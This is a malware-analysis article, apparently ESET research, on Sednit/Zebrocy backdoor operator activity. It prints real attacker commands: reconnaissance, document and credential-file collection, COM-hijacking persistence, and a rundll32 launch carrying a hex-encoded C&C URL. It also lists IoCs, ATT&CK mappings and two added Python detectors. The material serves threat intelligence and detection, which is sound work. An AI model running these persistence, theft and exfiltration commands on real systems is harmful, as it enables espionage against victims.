# A journey to Zebrocy land

[welivesecurity.com/2019/05/22/journey-zebrocy-land](https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/)

May 22, 2019

ESET sheds light on commands used by the favorite backdoor of the Sednit group

[ESET Research, 22 May 2019 - 11:30AM](https://www.welivesecurity.com/author/esetresearch/)

What happens when a victim is compromised by a backdoor and the operator is controlling it? It’s a difficult question that is not possible to answer entirely by reverse engineering the code. In this article we will analyze commands sent by the operator to their targets.

The Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – has been operating since at least 2004 and has made headlines frequently in past years. Recently, we unveiled the existence of a UEFI rootkit, called [LoJax](https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/), which we attribute to the Sednit group. This is a first for an APT group, and shows Sednit has access to very sophisticated tools to conduct its espionage operations.

Three years ago, the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia. Since then, the number and diversity of components has increased drastically. [ESET researchers](https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/) [and colleagues](https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/) from [other](https://securelist.com/masha-and-these-bears/84311/) [companies](https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/) have documented these components; however, in this article we will focus on what’s beyond the compromise, what the operators do once a victim system is running a Zebrocy Delphi backdoor.
# The bear’s bait

At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for [credential phishing](https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-full.pdf). However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain.

The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign.

Figure 1. Statistics of the Bitly URL

About 20 clicks were recorded on this link in the same week that the URL was created, and these presumably downloaded the target archive. Let’s keep in mind that this may mean fewer than 20 potential victims, as victims may have clicked on the URL twice, or maybe even more times, because the outcome was not what they expected… as we will describe below.

While ESET telemetry data indicates that this URL was delivered by spearphishing emails, we don’t have a sample of such an email. The shortened URL leads the victim to an IP-address-based URL, where the archived payload is located. Unfortunately, without the email message, we don’t know if there are any instructions for the user, if there is any further social engineering, or if it relies solely on the victim’s curiosity.

The archive contains two files; the first is an executable file, while the second is a decoy PDF document. Note there is a typo in the executable’s filename; it should be “ДОВIДНИК” instead of “ДОВIДНIК”. Once the binary is executed, a password prompt dialog box opens. The result of the password validation will always be wrong, but after the apparent validation attempt, the decoy PDF document is opened. That document appears to be empty, but the downloader, which is written in Delphi, continues running in the background.

Figure 2. Files extracted from the archive (Google Translate suggests “CATALOGUE – (2018).exe” and “Order 97.pdf” from the Ukrainian)

The same IP address is also used in the URL hardcoded into the first binary downloader.

# The bear’s lair

The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. Once again, this downloader is as straightforward as the Zebrocy gang’s other downloaders. It creates an ID and downloads a new, interesting backdoor, (this time) written in Delphi.

As we explained in our [most recent blogpost about Zebrocy](https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/), the configuration of the backdoor is stored in the resource section and is split into four different hex-encoded, encrypted blobs. These blobs contain the different parts of the configuration.

Once the backdoor sends basic information about its newly compromised system, the operators take control of the backdoor and start to send commands right away. Hence, the time between the victim running the downloader and the operators’ first commands is only a few minutes.

Figure 3. Overview of the resource section

# How the bear hunts

In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor. The commands available are located in one of the configuration blobs mentioned earlier (the “commands” blob in Figure 3). The number of supported commands has increased over time, with the latest version of the backdoor having more than thirty. As we did not identify a pattern in the order in which the commands are invoked, we believe the operators are executing them manually.
The first set of commands gathers information about the victim’s computer and environment:

| Command | Arguments |
|---|---|
| `SCREENSHOT` | None |
| `SYS_INFO` | None |
| `GET_NETWORK` | None |
| `SCAN_ALL` | None |

The commands above are commonly executed when the operators first connect to a newly activated backdoor. They don’t have any arguments, and they are quite self-explanatory. Other commands commonly seen shortly after these backdoors are activated are listed below:

| Command | Arguments |
|---|---|
| `REG_GET_KEYS_VALUES` | `HKEY_CURRENT_USER Software\Microsoft\Windows\CurrentVersion` |
| `DOWNLOAD_DAY(30)` | `c:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;` <br> `d:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;` |
| `DOWNLOAD_DAY(1)` | `c:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;` <br> `d:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;` |
| `CMD_EXECUTE` | `echo %APPDATA%` <br> `ipconfig /all` <br> `netstat -aon` |
| `CMD_EXECUTE` | `wmic process get Caption,ExecutablePath` <br> `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s` |

Those who have already read our previous articles about Zebrocy will notice that more or less the same kind of information is sent, over and over again, by previous stages. This information is requested within a few minutes of initial compromise, and the amount of data the operator will have to deal with is quite considerable.

In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group.
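The reconnaissance burst in the table above (echo %APPDATA%, ipconfig, netstat, wmic, reg query on the Run key) arriving from one parent process within minutes is a detection opportunity on its own. The following is an added example, not ESET’s code or tooling: it runs over constructed process-creation events in an assumed `time|host|parent|cmdline` format and flags any parent that spawns three or more of these commands inside a five-minute window.

```python
from datetime import datetime, timedelta

# Substrings of the CMD_EXECUTE commands the operators ran right after compromise.
RECON_MARKERS = ("echo %appdata%", "ipconfig /all", "netstat -aon",
                 "wmic process get", "currentversion\\run")
WINDOW = timedelta(minutes=5)   # the article: first commands arrive within minutes
THRESHOLD = 3                   # distinct recon commands from one parent inside WINDOW

def parse_event(line):
    """Constructed event format: ISO time|host|parent image|child command line."""
    ts, host, parent, cmd = line.split("|", 3)
    return datetime.fromisoformat(ts), host, parent, cmd

def find_recon_bursts(lines):
    """Return {(host, parent): sorted matched markers} for every burst found."""
    seen = {}  # (host, parent) -> [(time, marker)]
    for line in lines:
        ts, host, parent, cmd = parse_event(line)
        for marker in RECON_MARKERS:
            if marker in cmd.lower():
                seen.setdefault((host, parent), []).append((ts, marker))
    bursts = {}
    for key, events in seen.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # all distinct markers seen within WINDOW of this event
            markers = {m for t, m in events[i:] if t - start <= WINDOW}
            if len(markers) >= THRESHOLD:
                bursts[key] = sorted(markers)
                break
    return bursts

# Constructed sample: one host shows the Zebrocy burst, the other only routine admin use.
PARENT = "C:\\Users\\u\\AppData\\Roaming\\svc.exe"
SAMPLE = [
    f"2018-08-29T10:01:05|ws17|{PARENT}|cmd.exe /c echo %APPDATA%",
    f"2018-08-29T10:01:07|ws17|{PARENT}|cmd.exe /c ipconfig /all",
    f"2018-08-29T10:01:09|ws17|{PARENT}|cmd.exe /c netstat -aon",
    f"2018-08-29T10:02:30|ws17|{PARENT}|cmd.exe /c wmic process get Caption,ExecutablePath",
    f'2018-08-29T10:02:41|ws17|{PARENT}|cmd.exe /c reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /s',
    "2018-08-29T10:40:00|ws22|C:\\Windows\\explorer.exe|cmd.exe /c ipconfig /all",
    "2018-08-29T11:30:00|ws22|C:\\Windows\\explorer.exe|cmd.exe /c netstat -aon",
]

if __name__ == "__main__":
    for (host, parent), markers in find_recon_bursts(SAMPLE).items():
        print(f"{host}: {parent} ran {len(markers)} recon commands: {markers}")
```

Tune `WINDOW` and `THRESHOLD` to local baselines; the point is the combination and timing of these commands under one parent, not any single one of them.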
In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016:

| Command | Arguments |
|---|---|
| `UPLOAD_AND_EXECUTE_FILE` | `C:\ProgramData\Office\MS\msoffice.exe` […] `4D5A9000…` |

These dumpers create log files indicating the presence or absence of potential databases to dump:

| Command | Arguments |
|---|---|
| `DOWNLOAD_LIST` | `C:\ProgramData\Office\MS\out.txt` <br> `C:\ProgramData\Office\MS\text.txt` |

The current dumper produces the following output when there are no databases to dump:

```
%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\Default\Login Data not found
%LOCALAPPDATA%\Chromium\User Data\Default\Login Data not found
%LOCALAPPDATA%\7Star\7Star\User Data\Default\Login Data not found
%LOCALAPPDATA%\CentBrowser\User Data\Default\Login Data not found
```

These dumpers are quickly removed once they have done their job. Moreover, the backdoor contains a list of filenames related to credentials from the software listed below (database names):

| Filename | Description |
|---|---|
| key3.db | Firefox private keys (now named key4.db) |
| cert8.db | Firefox certificate database |
| logins.json | Firefox encrypted password database |
| account.cfn | The Bat! (email client) account credentials |
| wand.dat | Opera password database |

The operators take care of retrieving these databases if they are present on the victim’s computer.

| Command | Arguments |
|---|---|
| `DOWNLOAD_LIST` | `%APPDATA%\The Bat!\Account.CFN` <br> `%APPDATA%\The Bat!\[REDACTED]\Account.CFN` |

The operators retrieve these files from the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer.

Finally, depending on how interesting the victim is, the malware operators may deploy another custom backdoor.
This backdoor is executed using the CMD_EXECUTE command:

| Command | # | Arguments |
|---|---|---|
| `CMD_EXECUTE` | 1 | `reg add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}" /ve /d "Reliability Maintenance Control Panel" /reg:64 /f&reg add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\InProcServer32" /ve /d "%APPDATA%\Microsoft\WinSupport\RMC\mtrcpl.dll" /reg:64 /f&reg add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Both" /reg:64 /f` |
| | 2 | `rundll32.exe "%APPDATA%\Microsoft\WinSupport\RMC\mtrcpl.dll",#1 687474703A2F2F[REDACTED]` |
| | 3 | `dir /s /b /o:gn %APPDATA%\Microsoft\` |

There are some interesting facts here. First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor, while in the Delphi backdoor the C&C is embedded in the configuration.

The two Delphi backdoors, the common one and the one above, are quite similar but contain these interesting tweaks:

| | Common Delphi backdoor | Custom Delphi backdoor |
|---|---|---|
| Delphi compiler version | 14.0-15.0 | 32.0 |
| 32/64-bit | 32-bit | 64-bit |
| Configuration location | resource section | no config (C&C is passed as an argument) |
| Number of commands | 5 | 3 |
| Encryption algorithm | AES ECB | custom |
| Lifetime on the computer | a few days | a few hours |

Once again, it’s not very clear what the purpose of this custom backdoor is. The detection ratio is definitely lower in comparison to the “usual” backdoor. The very short timeframe where this backdoor is on the system and operating makes it harder to retrieve. Once its operators complete their evil deeds, they quickly remove it.

# Summary

Observing commands used in the wild by the operator is quite interesting. They are gathering a considerable amount of information on the compromised target and they are not worried about duplicated data.
It shows a large gap between the development strategy and what operators do in practice. Backdoors with custom configuration and modules are deployed very carefully, which indicates some precautions to avoid ending up in the hands of researchers. The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated?

# Indicators of Compromise (IoCs)

URLs:

- http://45.124.132[.]127/DOVIDNIK - (2018).zip
- http://45.124.132[.]127/action-center/centerforserviceandaction/service-and-action.php

| SHA-1 | ESET detection name |
|---|---|
| 48f8b152b86bed027b9152725505fbf4a24a39fd | Win32/TrojanDownloader.Sednit.CMT |
| 1e9f40ef81176190e1ed9a0659473b2226c53f57 | Win32/HackTool.PSWDump.D |
| bfa26857575c49abb129aac87207f03f2b062e07 | Win32/PSW.Agent.OGE |

# MITRE ATT&CK techniques

| Tactic | ID | Name | Description |
|---|---|---|---|
| Initial Access | [T1192](https://attack.mitre.org/techniques/T1192/) | Spearphishing Link | Spearphishing emails using a URL-shortener service to trick the victim into clicking on a link to a zip file containing malicious files. |
| Execution | [T1204](https://attack.mitre.org/techniques/T1204/) | User Execution | Tricks users into running an executable with an icon that looks like a Microsoft Word document. |
| Execution | [T1085](https://attack.mitre.org/techniques/T1085/) | Rundll32 | rundll32.exe has been used to run a new, downloaded, malicious DLL. |
| Execution | [T1047](https://attack.mitre.org/techniques/T1047/) | Windows Management Instrumentation | WMI commands to gather victim host details. |
| Execution | [T1053](https://attack.mitre.org/techniques/T1053/) | Scheduled Task | Schedule task to execute malicious binaries. |
| Persistence | [T1060](https://attack.mitre.org/techniques/T1060/) | Registry Run Keys / Startup Folder | Registry key HKCU\Software\Microsoft\CurrentVersion\Run\ used for persistence. |
| Persistence | [T1122](https://attack.mitre.org/techniques/T1122/) | Component Object Model Hijacking | COM hijacking for persistence. |
| Defense Evasion | [T1107](https://attack.mitre.org/techniques/T1107/) | File Deletion | Deletes files (binaries and files created) after usage. |
| Defense Evasion | [T1089](https://attack.mitre.org/techniques/T1089/) | Disabling Security Tools | Kills processes. |
| Discovery | [T1012](https://attack.mitre.org/techniques/T1012/) | Query Registry | Registry keys enumeration. |
| Discovery | [T1057](https://attack.mitre.org/techniques/T1057/) | Process Discovery | Lists running processes. |
| Discovery | [T1082](https://attack.mitre.org/techniques/T1082/) | System Information Discovery | Uses systeminfo command to gather information about the victim. |
| Discovery | [T1083](https://attack.mitre.org/techniques/T1083/) | File and Directory Discovery | Uses echo ENV command to list the content of a directory. |
| Collection | [T1005](https://attack.mitre.org/techniques/T1005/) | Data from Local System | Scans files that match extensions listed in the malware. |
| Collection | [T1039](https://attack.mitre.org/techniques/T1039/) | Data from Network Shared Drive | Enumerates remote and local drives and then exfiltrates files matching specific extensions. |
| Collection | [T1025](https://attack.mitre.org/techniques/T1025/) | Data from Removable Media | Enumerates remote and local drives and then exfiltrates files matching specific extensions. |
| Collection | [T1074](https://attack.mitre.org/techniques/T1074/) | Data Staged | Creates file containing path of all files to exfiltrate. |
| Collection | [T1056](https://attack.mitre.org/techniques/T1056/) | Input Capture | Keylogger feature. |
| Collection | [T1113](https://attack.mitre.org/techniques/T1113/) | Screen Capture | Screenshot feature. |
| Exfiltration | [T1020](https://attack.mitre.org/techniques/T1020/) | Automated Exfiltration | Automatically prepares a file with all file paths to retrieve and sends it. |
| Exfiltration | [T1022](https://attack.mitre.org/techniques/T1022/) | Data Encrypted | Data sent are hex-encoded, encrypted with a known algorithm or a custom one. |
| Exfiltration | [T1041](https://attack.mitre.org/techniques/T1041/) | Exfiltration Over Command and Control Channel | Data are exfiltrated to a C&C server. |
| Command And Control | [T1043](https://attack.mitre.org/techniques/T1043/) | Commonly Used Port | Downloaders and backdoors use ports 80 or 443 to communicate with the C&C server. |
| Command And Control | [T1024](https://attack.mitre.org/techniques/T1024/) | Custom Cryptographic Protocol | Data sent are hex-encoded, encrypted with AES or a custom algorithm. |
| Command And Control | [T1132](https://attack.mitre.org/techniques/T1132/) | Data Encoding | Data sent are hex-encoded, encrypted with a known algorithm or a custom one. |
| Command And Control | [T1001](https://attack.mitre.org/techniques/T1001/) | Data Obfuscation | Data sent are hex-encoded, encrypted with a known algorithm or a custom one. |
| Command And Control | [T1008](https://attack.mitre.org/techniques/T1008/) | Fallback Channels | A fallback C&C server is embedded in the configuration. |
| Command And Control | [T1079](https://attack.mitre.org/techniques/T1079/) | Multilayer Encryption | Data sent are hex-encoded, encrypted with a known algorithm or a custom one. |
| Command And Control | [T1071](https://attack.mitre.org/techniques/T1071/) | Standard Application Layer Protocol | HTTP, HTTPS are used to communicate. |
| Command And Control | [T1032](https://attack.mitre.org/techniques/T1032/) | Standard Cryptographic Protocol | Data sent are hex-encoded, encrypted with a known algorithm or a custom one. |
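The T1122 and T1085 rows correspond to the CMD_EXECUTE lines shown for the custom backdoor in “How the bear hunts”, and both tells are checkable in process-creation telemetry: an HKCU CLSID InProcServer32 value pointing into a user-writable directory, and a rundll32 call whose trailing argument is a hex-encoded URL (the 687474703A2F2F prefix decodes to http://). The following is an added example, not ESET’s tooling; the command lines are reconstructed from the table with a constructed placeholder C&C in place of [REDACTED].

```python
import re

USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%", "\\appdata\\", "\\users\\public\\")

# reg add "HKCU\Software\Classes\CLSID\{...}\InProcServer32" /ve /d "<dll path>"
REG_ADD_RE = re.compile(
    r'reg\s+add\s+"(HKCU\\Software\\Classes\\CLSID\\\{[0-9A-F-]{36}\}\\InProcServer32)"'
    r'\s+/ve\s+/d\s+"([^"]+)"', re.IGNORECASE)
# rundll32.exe "<dll>",#<ordinal> <hex blob>
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"([^"]+)",#?(\d+)\s+([0-9A-Fa-f]{8,})', re.IGNORECASE)

def hijacked_inprocservers(cmdline):
    """Return [(key, dll)] for HKCU CLSID in-process servers in user-writable locations."""
    return [(key, dll) for key, dll in REG_ADD_RE.findall(cmdline)
            if any(marker in dll.lower() for marker in USER_WRITABLE)]

def hex_url_arguments(cmdline):
    """Return [(dll, ordinal, decoded)] for rundll32 calls whose extra argument is a hex URL."""
    found = []
    for dll, ordinal, blob in RUNDLL_RE.findall(cmdline):
        try:
            decoded = bytes.fromhex(blob).decode("ascii")
        except ValueError:       # odd length, non-hex, or non-ASCII payload
            continue
        if decoded.lower().startswith(("http://", "https://")):
            found.append((dll, int(ordinal), decoded))
    return found

# Constructed sample: the article's command lines, with a placeholder C&C where it had [REDACTED].
CLSID = "{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}"
DLL = "%APPDATA%\\Microsoft\\WinSupport\\RMC\\mtrcpl.dll"
PERSIST_CMD = (
    f'reg add "HKCU\\Software\\Classes\\CLSID\\{CLSID}" /ve /d "Reliability Maintenance Control Panel" /reg:64 /f'
    f'&reg add "HKCU\\Software\\Classes\\CLSID\\{CLSID}\\InProcServer32" /ve /d "{DLL}" /reg:64 /f'
    f'&reg add "HKCU\\Software\\Classes\\CLSID\\{CLSID}\\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Both" /reg:64 /f')
LAUNCH_CMD = f'rundll32.exe "{DLL}",#1 ' + "http://c2.example.invalid/".encode().hex()

if __name__ == "__main__":
    print(hijacked_inprocservers(PERSIST_CMD))   # the mtrcpl.dll InProcServer32 entry
    print(hex_url_arguments(LAUNCH_CMD))         # decodes to the placeholder C&C URL
```

The same regexes run unchanged over a registry export or an EDR command-line field; a legitimate in-process server under HKCU pointing into %APPDATA% is rare enough to be worth a look on its own.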